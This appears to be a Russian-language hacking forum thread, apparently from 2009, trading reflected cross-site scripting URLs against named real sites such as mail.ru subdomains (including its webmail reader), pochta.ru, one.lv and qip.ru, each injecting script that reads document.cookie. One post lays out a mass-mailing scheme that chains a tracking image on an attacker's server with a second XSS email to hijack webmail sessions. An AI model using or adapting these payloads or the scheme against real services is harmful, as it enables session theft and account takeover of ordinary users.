http://torg.mail.ru/835/138479/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Etab_id=2

https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3 v')</script>
от Sinva

подправил
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3 Cscript%3Ealert(document.cookie)%3C/script%3E

мэил.ру

http://torg.mail.ru/2121/?'path_id=1229%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://torg.mail.ru/109/310670/?'tab_id=2%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

Уже прикрыли))

one.lv

http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(doc ument.cookie)</script>

Тока не орем))
Тут мне прислали письмо с QUELLE ( заказывал себе хрень одну ) при вводе скрипта в адресную строку я получил свои куки, но на других эта XSS не работает т.к. соответственно письмицо у них отсутствует ... есть какие небудь предложения по этому поводу ? Если надо выложу скрин.

По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке конечно если разослать миллиону товарищей то возможно эффект будет...

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.

пассивная xss на qip.ru


работает только у авторизованных